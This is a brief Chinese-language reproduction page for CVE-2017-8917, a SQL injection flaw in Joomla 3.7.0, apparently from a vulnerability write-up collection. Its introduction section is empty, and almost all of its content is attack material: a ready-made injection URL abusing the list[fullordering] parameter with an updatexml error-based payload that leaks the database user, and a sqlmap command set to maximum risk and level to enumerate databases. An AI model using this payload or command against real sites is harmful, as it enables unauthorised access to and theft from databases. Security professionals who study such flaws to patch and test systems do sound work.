（CVE-2017-8917）Joomla 3.7.0 QL注入漏洞¶

一、漏洞简介¶

二、漏洞影响¶

Joomla 3.7.0

三、复现过程¶

http://www.0-sec.org:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)

1
1.png

补充¶

sqlmap -u "http://www.0-sec.org/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]